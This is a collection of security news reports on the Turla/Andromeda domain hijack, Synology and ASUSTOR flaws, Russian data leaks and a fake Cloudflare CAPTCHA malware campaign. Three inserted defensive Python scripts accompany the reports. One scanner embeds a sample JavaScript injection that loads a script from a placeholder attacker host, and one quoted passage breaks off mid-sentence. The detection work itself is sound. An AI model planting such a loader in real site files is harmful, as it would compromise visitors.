
Hack group Turla took over the infrastructure of the old Andromeda botnet

Hack group Turla

Analysts at Mandiant report that the Russian-speaking cyber-espionage group Turla has seized command-and-control servers of the old Andromeda botnet, which law enforcement and security researchers took down back in 2017. Andromeda’s C&C servers appear to have been used by Turla to profile compromised hosts and select those suitable for intelligence-gathering and espionage operations.

Google-owned Mandiant tracks this Turla operation as the threat cluster UNC4210. The researchers write that the hijacked servers correspond to those contacted by Andromeda malware samples (also known as Gamarue and Wauchos) uploaded to VirusTotal as far back as 2013.

The researchers explain that Turla members waited for the registration of a number of domains to expire and then seized part of the old botnet infrastructure, which had been dismantled back in 2017. Let me remind you that the botnet was taken down at the time by a truly worldwide effort. The joint operation involved the FBI, Interpol, Europol’s cybercrime unit (EC3), Eurojust, the Joint Cybercrime Action Taskforce (J-CAT) and German law enforcement agencies, while the private sector was represented by specialists from Microsoft, ESET, Registrar of Last Resort, ICANN, FKIE, BSI and many others.

“Back in September 2022, UNC4210 re-registered at least three ANDROMEDA C&C domains after their registration expired and began profiling victims for the selective deployment of KOPILUWAK and QUIETCANARY,” Mandiant experts say.

Mandiant therefore believes that Turla is using old Andromeda infections as a channel for distributing its own malware, and that it may also be taking advantage of Andromeda’s ability to spread via infected USB drives.

“Malware spreading over USB continues to be a useful vector for gaining initial access to an organization’s networks,” the report notes. “As the old ANDROMEDA malware continues to spread via compromised USB devices, re-registered domains are a danger as new attackers can take control of them and deliver new malware to victims.”
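The risk described above is that a domain on an old blocklist or sinkhole list quietly changes hands once its registration lapses. The following script, an added example that is not Mandiant’s or the article’s code, shows the check a defender can run over a watch list of takedown-era C2 domains: any domain whose current registration was created after the takedown date has been re-registered and belongs back in a blocklist. All domain names, dates and registrar strings are constructed placeholders (reserved `.invalid` names, not real Andromeda indicators), and the records are embedded rather than fetched so the script runs offline; in practice they would be filled from a WHOIS or RDAP lookup, which is assumed to be available.

```python
"""Flag takedown-era C2 domains that have since been re-registered.

Added example, not Mandiant's or the article's code. Every domain name, date
and registrar below is a constructed placeholder (reserved .invalid TLD), not
a real Andromeda indicator. A real run would fill DomainRecord from a WHOIS or
RDAP lookup (assumed available); the records are embedded here so the script
runs offline.
"""
from dataclasses import dataclass
from datetime import date
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class DomainRecord:
    name: str
    created: Optional[date]     # creation date of the *current* registration; None if unregistered
    registrar: Optional[str]


# Placeholder for the date the botnet infrastructure was seized (the article only says 2017).
TAKEDOWN_DATE = date(2017, 12, 1)

# Constructed watch list: what a fresh lookup of three old C2 domains might return.
WATCHLIST = [
    DomainRecord("old-c2-one.invalid", date(2012, 3, 9), "OriginalRegistrar"),  # original registration, untouched
    DomainRecord("old-c2-two.invalid", date(2022, 9, 14), "NewRegistrarLtd"),   # created after takedown: re-registered
    DomainRecord("old-c2-three.invalid", None, None),                           # expired and still unregistered
]


def classify(rec: DomainRecord, takedown: date = TAKEDOWN_DATE) -> str:
    """Return 'unregistered', 're-registered' or 'original' for one record.

    A creation date later than the takedown means the original registration
    lapsed and someone registered the name again, which is exactly the window
    the article describes.
    """
    if rec.created is None:
        return "unregistered"
    if rec.created > takedown:
        return "re-registered"
    return "original"


def reregistered_domains(records: Iterable[DomainRecord], takedown: date = TAKEDOWN_DATE) -> List[str]:
    """Names of watch-listed domains that were registered again after the takedown."""
    return sorted(r.name for r in records if classify(r, takedown) == "re-registered")


def rpz_lines(names: Iterable[str]) -> List[str]:
    """Emit DNS response-policy-zone records that NXDOMAIN the name and its subdomains."""
    out = []
    for n in names:
        out.append(f"{n} CNAME .")
        out.append(f"*.{n} CNAME .")
    return out


if __name__ == "__main__":
    hits = reregistered_domains(WATCHLIST)
    print("re-registered:", hits)
    print("\n".join(rpz_lines(hits)))
```

The RPZ output is the format accepted by BIND and other resolvers that support response policy zones, so the flagged names can go straight into an internal DNS sinkhole; the same list is equally usable as a proxy or firewall blocklist.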

For example, in one incident analyzed by Mandiant, an infected USB drive was plugged into a machine at an unnamed Ukrainian organization in December 2021. An outdated version of Andromeda was deployed on the host when a malicious shortcut (.LNK) file masquerading as a folder on the drive was opened.

Because the attackers were using one of the domains seized in January 2022 (formerly part of the botnet infrastructure) to profile victims, the command-and-control server delivered the KOPILUWAK dropper, a JavaScript utility for network reconnaissance, to this infected machine.

Two days later, on September 8, 2022, the attack entered its final phase with the deployment of the QUIETCANARY malware (also known as Tunnus), which ultimately led to the theft of files from the victim’s system.

“Used by widespread, financially motivated malware, this new technique for hijacking expired domains could provide a secondary compromise to a wide range of organizations. In addition, old malware and its infrastructure may be overlooked by defenders who sort out various warnings,” the experts warned.

Catch up on more articles here

Follow us on Twitter here

Synology Fixes Critical Vulnerability in VPN Routers

VPN Routers

Taiwanese manufacturer Synology has fixed a vulnerability that scored 10 out of 10 on the CVSS rating scale. The issue affects routers configured to act as VPN servers using Synology VPN Plus Server.

The vulnerability is tracked as CVE-2022-43931 and is described as an out-of-bounds write bug in the remote desktop functionality of Synology VPN Plus Server.

The manufacturer said that successful exploitation of the bug, discovered by the company’s own security team, “allows remote attackers to execute arbitrary commands through arbitrary vectors.” It is also known that exploitation requires neither privileges on the target router nor any user interaction.

As a result, users of VPN Plus Server for Synology Router Manager (SRM) 1.2 and VPN Plus Server for SRM 1.3 are advised to upgrade to versions 1.4.3-0534 and 1.4.4-0635 respectively as soon as possible.

It is also worth noting that Synology engineers have warned of several bugs in SRM itself that allow remote attackers to execute arbitrary commands, carry out denial-of-service attacks, and read arbitrary files.

The exact details of these vulnerabilities have not been disclosed, but users are strongly advised to upgrade to versions 1.2.5-8227-6 and 1.3.1-9346-3 to mitigate potential risks.

Interestingly, a number of vulnerabilities in Synology devices were demonstrated at the Pwn2Own hacker competition, which took place in mid-December. Although Synology did not list the CVE IDs for these issues, it appears that these are the bugs discovered and exploited by the researchers at Pwn2Own.


WhatsApp fights censorship and launches support for proxy servers

WhatsApp fights censorship

WhatsApp developers have announced that the messenger now supports connecting through proxy servers for cases where a government blocks the service in the user’s country or there are internet outages. The new option is already available to all users of the latest versions of WhatsApp for iOS and Android.

“We continue to fight for your right to free and confidential communication. Now, even if a direct connection to WhatsApp is not possible, you can stay connected through a server created by volunteers and organizations that help others communicate freely,” the developers write in their announcement. “With this feature, everyone will have access to WhatsApp, even if the Internet connection in the region is blocked or interrupted.”

The official announcement emphasizes that connecting through a proxy still ensures the privacy and security of communication since user messages are still protected by end-to-end encryption. That is, no one on the side of the proxy server, Meta* or WhatsApp will be able to read them.

At the same time, as the screenshot below shows, when the proxy is turned on the user is warned that their IP address may be visible to the proxy provider.

The developers also write that setting up your own proxy server is not difficult at all, and have published instructions for doing so.

“We hope that in 2023 no one will have to deal with internet outages. Internet access restrictions that have been in place in Iran for months are a violation of human rights and prevent people from receiving emergency care. If such cases are repeated, our solution will help people maintain safe and reliable communication with each other,” the developers summarize.

* Meta Platforms is recognized as an extremist organization and its activities are banned in Russia


The company Sportmaster leaked customer data


In the last days of 2022, data on customers of the Sportmaster chain of stores was published online. Information security experts reported that the dump contains about 100,000,000 lines. The company confirmed that customers’ names, dates of birth, phone numbers and email addresses were indeed in the attackers’ hands.

The leak was reported by several Telegram channels at once, including Data1eaks and the specialists of Data Leakage & Breach Intelligence (DLBI). According to the experts, the dump was published by the same attackers who were previously behind the data leaks from the Vkusvill online store, the GeekBrains educational platform, the Russian Post, and many other companies and organizations.

The researchers report that the text file published on December 31 contained 1,655,406 lines (269,499 unique email addresses and 1,316,510 unique mobile and home phone numbers), and the most recent entry was dated August 2021.

A few days after the publication of the first file, the hackers released a second one containing almost 100,000,000 lines. This time the most recent (and only new) entry was dated November 16, 2022; however, DLBI experts note that the vast majority of the lines still refer to 2010-2013, and that the data from the first (smaller) file is duplicated in the second part of the leak.

Both of these dumps include the following client information:

  • Email address (13.4 million unique addresses);
  • Mobile and home phone numbers (45.89 million unique numbers);
  • Postal address;
  • Date of birth;
  • Sex.

Representatives of “Sportmaster” confirmed the authenticity of this leak.

“On December 31, an archive with the data of Sportmaster’s clients was published in one of the Telegram channels. Names, dates of birth, phone numbers and email addresses were at the disposal of the attackers. Based on the results of the study of the archive, it was confirmed that the incident does not affect user logins and passwords, payment information, as well as employee credentials,” the company said.

It is reported that the company is already investigating and finding out the causes of the incident. According to preliminary data, the leak occurred through one of the company’s contractors, who had access to the specified information. According to the analysis already carried out, the data that got into the network could be dated to 2019.


SoundCloud service blocked in Russia at the request of the Prosecutor General’s Office

SoundCloud service

Roskomnadzor blocked the SoundCloud music service in Russia after receiving a request from the Prosecutor General’s Office dated September 22. SoundCloud is already present in the registry of prohibited information.

It is reported that the basis for the blocking was Article 15.3 of the Law “On Information”, which regulates restriction of access to information containing calls for mass riots and participation in unauthorized actions, extremism, as well as unreliable socially significant information distributed under the guise of reliable reports (that is, fakes).

Since the site uses the HTTPS protocol, blocking one of the pages leads to the unavailability of the entire site on the territory of the Russian Federation.

The department explained that the reason for the blocking was the spread of fakes about the Russian special operation in Ukraine.

“At the request of the Prosecutor General’s Office of Russia, Roskomnadzor restricted access to the SoundCloud service in connection with the placement of materials containing false information regarding the nature of the special military operation on the territory of Ukraine, its form, methods of conducting hostilities (attacks on civilians, strikes on civilian infrastructure), about numerous casualties among the civilian population at the hands of Russian soldiers,” the press service of Roskomnadzor reported.

Let me remind you that SoundCloud began its work in 2008 and is still used as a platform for distributing music and podcasts.


Positive Technologies Helps Fix Vulnerability in ASUSTOR NAS


Positive Technologies expert Nikita Abramov has discovered a vulnerability in the ASUSTOR Data Master (ADM) operating system, which is used to manage NAS devices. An attacker could remotely execute arbitrary code on the operating system of NAS devices.

The issue was assigned CVE-2022-37398 (BDU:2022-05028) and rated 7.1 out of 10 on the CVSS v3 scale, which corresponds to high severity.

It is noted that at present, the IP addresses of about 3,700 potentially vulnerable NAS devices can be found on the Internet. Most of these devices were seen in Taiwan, China, South Korea, Germany, USA, France, Russia, Japan, Hong Kong, and Singapore.

The discovered vulnerability affects several versions of ASUSTOR Data Master: 3.5.9.RUE3, 4.0.5.RVI1, 4.1.0.RJD1, as well as earlier software versions.

As a workaround, device administrators can disable the WebDAV protocol. To fully address the vulnerability, ASUSTOR recommends updating affected product versions to the following or newer versions:

  • ADM 4.1 needs to be upgraded to version 4.1.0.RKM1;
  • ADM 4.0 needs to be upgraded to version 4.0.5.RWM1;
  • ADM 3.5 needs to be upgraded to version 3.5.9.RWM1.
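Both this advisory and the Synology one above reduce to the same fleet question: is the version a device reports at or above the fixed version for its branch, and if not, is the workaround in place? The script below is an added example, not ASUSTOR’s or Synology’s tooling. The fixed-version tables repeat the numbers quoted in the two articles; the device inventory is constructed. It assumes that an ADM version has the form major.minor.patch.BUILD and that the BUILD tag compares lexicographically (true for the pairs in the advisory, RUE3 < RWM1, RVI1 < RWM1 and RJD1 < RKM1, though ASUSTOR does not document this), that Synology versions are dot- and dash-separated integers, and that VPN Plus Server 1.4.3-0534 pairs with SRM 1.2 and 1.4.4-0635 with SRM 1.3, following the order in which the article lists them.

```python
"""Check reported ADM / SRM / VPN Plus Server versions against the fixed versions.

Added example, not ASUSTOR's or Synology's tooling. Fixed versions are the
ones quoted in the articles; the inventory is constructed. Assumptions:
ADM BUILD tags compare lexicographically; Synology versions are integer
fields split on '.' and '-'; VPN Plus 1.4.3-0534 belongs to SRM 1.2 and
1.4.4-0635 to SRM 1.3 (the order the article lists them in).
"""
import re
from typing import Dict, Optional, Tuple

ADM_FIXED = {"3.5": "3.5.9.RWM1", "4.0": "4.0.5.RWM1", "4.1": "4.1.0.RKM1"}
SRM_FIXED = {"1.2": "1.2.5-8227-6", "1.3": "1.3.1-9346-3"}
VPNPLUS_FIXED = {"1.2": "1.4.3-0534", "1.3": "1.4.4-0635"}   # keyed by the SRM branch the package runs on

_ADM_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.([A-Z0-9]+)")


def adm_key(version: str) -> Tuple[int, int, int, str]:
    """Sort key for an ADM version string such as '4.1.0.RJD1'."""
    m = _ADM_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"not an ADM version: {version!r}")
    return int(m[1]), int(m[2]), int(m[3]), m[4]


def syno_key(version: str) -> Tuple[int, ...]:
    """Sort key for a Synology version string such as '1.3.1-9346-3' or '1.4.4-0635'."""
    parts = re.split(r"[.-]", version.strip())
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Synology version: {version!r}")
    return tuple(int(p) for p in parts)


def branch(version: str) -> str:
    """'major.minor' of any of the version formats above."""
    return ".".join(version.strip().split(".")[:2])


def adm_status(version: str, webdav_enabled: bool = True) -> str:
    """'patched', 'workaround' (unpatched but WebDAV disabled), 'vulnerable' or 'unknown-branch'."""
    fixed = ADM_FIXED.get(branch(version))
    if fixed is None:
        return "unknown-branch"
    if adm_key(version) >= adm_key(fixed):
        return "patched"
    return "workaround" if not webdav_enabled else "vulnerable"


def srm_status(srm_version: str, vpnplus_version: Optional[str] = None) -> Dict[str, str]:
    """Status of the SRM firmware and, if installed, the VPN Plus Server package."""
    b = branch(srm_version)
    if b not in SRM_FIXED:
        return {"srm": "unknown-branch"}
    out = {"srm": "patched" if syno_key(srm_version) >= syno_key(SRM_FIXED[b]) else "vulnerable"}
    if vpnplus_version is not None:
        out["vpnplus"] = "patched" if syno_key(vpnplus_version) >= syno_key(VPNPLUS_FIXED[b]) else "vulnerable"
    return out


# Constructed inventory: (hostname, product, version, extra) as an asset database might export it.
INVENTORY = [
    ("nas-01", "adm", "4.1.0.RJD1", {"webdav_enabled": True}),
    ("nas-02", "adm", "3.5.9.RUE3", {"webdav_enabled": False}),
    ("nas-03", "adm", "4.0.5.RWM1", {"webdav_enabled": True}),
    ("rt-01", "srm", "1.3.0-9346", {"vpnplus": "1.4.3-0534"}),
    ("rt-02", "srm", "1.2.5-8227-6", {}),
]

if __name__ == "__main__":
    for host, product, version, extra in INVENTORY:
        if product == "adm":
            print(host, version, adm_status(version, extra["webdav_enabled"]))
        else:
            print(host, version, srm_status(version, extra.get("vpnplus")))
```

The WebDAV flag is what turns the ASUSTOR workaround into something an inventory can track: a device that is unpatched but has WebDAV off is reported separately, so it is neither lost among the patched ones nor paged on as an emergency.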

“When using buffer overflow vulnerabilities, as in this case, the attacker gets the opportunity to use the attacked subroutine to write beyond the boundaries of the allocated buffer. Sometimes this can lead to a violation of the program logic, to a denial of service (DoS), or, in some cases, to the execution of arbitrary code, which allows various scripts to be executed on the side of the attacked host,” says Nikita Abramov. “For example, install malware to intercept data, use encryption programs, and download confidential data. Very often, such errors occur when there is no check for the maximum length of the received data or when it is processed incorrectly. In this case, successfully executing the code on the attacked device allows an error that occurs when working with the header of the incoming request,


Fraudsters send out chain letters from Dodo Pizza and Papa Johns again

Dodo Pizza

In September, 100 fake “Dodo Pizza” and “Papa John’s” resources were discovered. The fraudsters debit 900 rubles instead of one and harvest bank card data.

The scammers are back with pizza. The scheme we wrote about in early September is still active: Group-IB specialists have reported a new batch of fake Dodo Pizza and Papa Johns sites.

Fake sites are distributed using the “chain letters” method – a survey participant on a fake site needs to send a link to 20 friends.

The experts’ “autumn catch” includes more than 100 scam sites. Those hoping to get a pizza for 1 ruble entered their bank card details, only to have 899 rubles debited from their account. In addition, the card itself was compromised.

Fake Papa John’s sites offer a 25% discount. You can pay for the order only by card, and an additional zero is added to the cost. So, when ordering for 1300 rubles, 13,000 rubles were debited from the account.

“Raffle prizes under the guise of a survey or a nice discount on behalf of well-known brands is a very popular type of scam,” recalls Evgeny Egorov, Group-IB Lead Analyst of the Digital Risk Protection Department. “According to our estimates, the number of cases of such online fraud increased by 579% in the first half of the year alone.”

Pizzerias attract scammers more than other types of fast food. In August, scammers offered to win a pizza on behalf of well-known Russian banks. Cardholders themselves complained about such “promotions”. The scam has since been stopped.

A year ago, the same Dodo Pizza and Papa John’s chains faced an attack by clone sites: 160 phishing sites were blocked between May and July. The approximate damage to Dodo Pizza customers amounted to 2.79 million rubles, and the Papa Johns company estimated its losses at 1.5 million rubles over half a year.


Data of millions of DNS users leaked to the network

DNS users

Over the weekend, Data Leakage & Breach Intelligence (DLBI) experts warned that a partial dump with information about buyers of the DNS electronics store (dns-shop.ru) got into the network. The leak is dated late September and contains 16,524,282 entries.

According to the experts, the information was published by the same source that last month leaked data on the clients of another large online store, Online Trade (onlinetrade.ru), as well as the Delivery Club delivery service, the GeekBrains educational platform, the Russian Post, and others.

A partial DNS dump contains the following user data:

  • First name / last name (not for everyone);
  • Email address (7.7 million unique addresses);
  • Telephone (11.4 million unique numbers);
  • Username

Judging by the information from the dump, it was made no earlier than September 19, 2022.

The researchers also note that another SQL dump of this store, dated June 12, 2008 (and not 2013, as indicated in the file name) has been in the public domain for quite a long time and even contains hashed user passwords.

Representatives of the DNS have already published an official statement in which they confirmed the leakage of personal data of customers and employees. The company reports that an investigation into the incident is currently underway, and work is underway to eliminate the consequences of the attack.

“We see that the attack was carried out by a group of hackers. Hacking was carried out from servers located outside the Russian Federation. We have already found gaps in the protection of our information infrastructure and are working to strengthen information security in the company,” the DNS says.

It is also emphasized that the attackers did not steal user passwords and bank card data, which, in principle, were not stored on the store’s servers.


Network hackers find the right vulnerability in less than 10 hours

Network hackers

A recent survey showed that a modern attacker finds a vulnerability that lets them bypass the network perimeter in less than ten hours. Once inside, in half of the cases it takes them less than five hours to get data out of the compromised system.

The survey, which helps estimate how much time organizations have to detect and stop an attack, was conducted by the SANS Institute together with security provider Bishop Fox. More than 300 ethical hackers from different countries took part.

Almost two-thirds of the respondents have between one and six years of experience in the field (network security, pentesting, application security, etc.), and about 30% have between seven and 20 years. The best results in gaining access to the target network were shown by cloud security testers.

Most often, hackers rely on misconfigurations, software vulnerabilities, and poorly protected web services for this purpose. Nearly two-thirds of those surveyed said that after penetrating the internal network they can collect and exfiltrate data within five hours, and 41% within two hours or less.

“Five or six hours of hacking is no surprise to me, I’m an ethical hacker myself,” Tom Eston, Bishop Fox’s associate vice president of consulting, told Dark Reading. “The results are in line with what we see in real-life hacks using social engineering, phishing and other vectors.”

Nearly three-quarters of survey participants believe that many organizations lack the detection and response capabilities to stop an attack and thereby limit the damage.

The most cost-effective vectors of hacker attacks, according to respondents, are social engineering and phishing (49% of responses). A quarter of respondents for the same reasons preferred attacks on web applications, cracking passwords and ransomware.

The full survey report can be downloaded from the Bishop Fox website (in exchange for your contact details). The survey adds to the pool of data available to security experts who aim to help businesses repel attacks with minimal losses.

For example, the CrowdStrike team recently found that it takes the average attacker less than an hour and a half to move from the initial entry point to other systems on the corporate network. The results obtained by Positive Technologies a year ago are more modest: an average of two days, with a lower bound of half an hour set earlier. And ransomware is usually launched into the network three days after the initial compromise.


Hackers use fake CloudFlare captcha to hide Trojan download

CloudFlare captcha

Sucuri is tracking the evolution of a campaign launched in August that plants a RAT together with an infostealer. The attackers inject JavaScript into WordPress sites that displays a fake Cloudflare security page and prompts the visitor to download some software to complete the check.

The malicious JavaScript is injected by adding three lines of code to CMS core components or to theme or plugin files. The number of sites infected in the course of the new attacks is small, fewer than 1,000; in almost half of the cases the injected code was found in /wp-includes/js/jquery/jquery.min.js.

Previously, this script downloaded the content it needed to work (at the time, a fake Cloudflare DDoS protection warning) from the adogeevent[.]com domain. The new JavaScript variants request different domains, although the IP address remains the same.
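The injection pattern described above (a few lines appended to a core file that then load a script from an attacker-controlled host) is easy to check for once you have a clean baseline. The script below is an added example, not Sucuri’s tooling. The two file bodies are constructed: a stand-in for a pristine minified library and the same file with three lines appended that create a script element pointing at a placeholder host (`attacker-controlled.invalid`, not the domain named in the article). The allowlist of trusted hosts and the baseline hash are likewise constructed. A real deployment would walk `/wp-includes`, `/wp-content/themes` and `/wp-content/plugins` and take its baseline hashes from a clean copy of the same WordPress release.

```python
"""Scan WordPress JavaScript files for appended script injections.

Added example, not Sucuri's code. CLEAN_JS, INJECTED_JS, TRUSTED_HOSTS and
the baseline hash are constructed; the injected host is a placeholder.
"""
import hashlib
import re
from pathlib import Path
from typing import Dict, List, Optional, Set

# Constructed allowlist: hosts this site legitimately loads scripts from.
TRUSTED_HOSTS = {"example-site.invalid", "code.jquery.com"}

# Stand-in for a pristine minified library: licence comment plus one line of code.
CLEAN_JS = (
    "/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */\n"
    "!function(e,t){\"use strict\";/* minified library body stand-in */}(window);\n"
)
# The same file with a three-line loader appended, the shape of injection the article describes.
INJECTED_JS = CLEAN_JS + (
    "var _0x=document.createElement('script');\n"
    "_0x.src='https://attacker-controlled.invalid/cf.js?'+Math.random();\n"
    "document.head.appendChild(_0x);\n"
)
BASELINE_SHA256 = hashlib.sha256(CLEAN_JS.encode()).hexdigest()

# Hostnames in absolute http(s) URLs.
HOST_RE = re.compile(r"https?://([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
SCRIPT_ELEMENT_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")


def scan_js(content: str, baseline_sha256: Optional[str] = None,
            trusted_hosts: Set[str] = TRUSTED_HOSTS, core_line_budget: int = 2) -> List[str]:
    """Return a list of findings for one JavaScript file; an empty list means nothing suspicious.

    core_line_budget is how many lines the pristine file has (minified core
    libraries are typically one or two lines), so anything beyond it is an
    appended tail and is inspected separately.
    """
    findings: List[str] = []
    digest = hashlib.sha256(content.encode()).hexdigest()
    if baseline_sha256 and digest != baseline_sha256:
        findings.append("hash mismatch against clean baseline")

    lines = content.splitlines()
    tail = "\n".join(lines[core_line_budget:])
    if tail:
        findings.append(f"{len(lines) - core_line_budget} line(s) appended after the expected end of file")

    # External hosts are checked over the whole file, since an injection may also be prepended.
    hosts = {h.lower() for h in HOST_RE.findall(content)}
    for h in sorted(hosts - {t.lower() for t in trusted_hosts}):
        findings.append(f"loads from untrusted host {h}")

    if tail and SCRIPT_ELEMENT_RE.search(tail):
        findings.append("appended code creates a script element at runtime")
    return findings


def scan_tree(root: str, baselines: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan every .js file under root; baselines maps a relative path to its clean SHA-256."""
    results: Dict[str, List[str]] = {}
    base = Path(root)
    for path in base.rglob("*.js"):
        rel = path.relative_to(base).as_posix()
        findings = scan_js(path.read_text(encoding="utf-8", errors="replace"), baselines.get(rel))
        if findings:
            results[rel] = findings
    return results


if __name__ == "__main__":
    print("clean   :", scan_js(CLEAN_JS, BASELINE_SHA256))
    print("injected:", scan_js(INJECTED_JS, BASELINE_SHA256))
```

Hash comparison alone already catches this campaign on core files, because a pristine release file has exactly one correct digest; the host and script-element heuristics are there for theme and plugin files, where a baseline is often not available but a minified library should still not be reaching out to an unknown host.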

Downloadable content has also changed. Now, a potential victim is presented with a CAPTCHA dialogue, supposedly pulled from the Cloudflare server.

Whatever value the visitor enters in the field (even the correct one), a hint pops up: to gain access to the site you must complete the verification, and if you have any problems, download our software so you don’t have to waste time on checks anymore.

Clicking on the inserted Download button downloads the .iso file, followed by unpacking the malicious content – CLOUDFLA.EXE or Cloudflare_security_installer.exe. To reinforce the illusion of legitimacy and divert attention, the Google Chrome update process is launched in the system: it is noteworthy that the updater uses the Russian language.

Meanwhile, the RAT, the NetSupport remote administration tool favoured by SocGholish ransomware, is installed on the system in the background. According to analysts this payload has remained the same, yet only two dozen antivirus engines on VirusTotal (as of September 15) detect it.

In addition to the RAT, the victim receives, as before, a Raccoon infostealer. Jerome Segura of Malwarebytes has a different opinion about this malware: he believes it is an Amadey Trojan with a C2 server in the United States. Kaspersky products and some other scanners detect the malicious kit with the verdict “banking Trojan”, so it is possible that the infection may result in financial losses.

Sucuri experts recorded a similar attack but using another fake CloudFlare page – a warning about blocking access.

At the same time, a Trojan file weighing 669.9 MB was offered for download. The author of the attack was apparently trying to bypass antiviruses this way, since they often skip large files due to size limits. The payload also included a note advising the user to run the executable, ostensibly to clean the system registry, although the malware could then be detected by behavioural analysis and heuristics.

Analysts also noted the case of hosting a payload on GitLab. The fraudulent account has already been blocked.
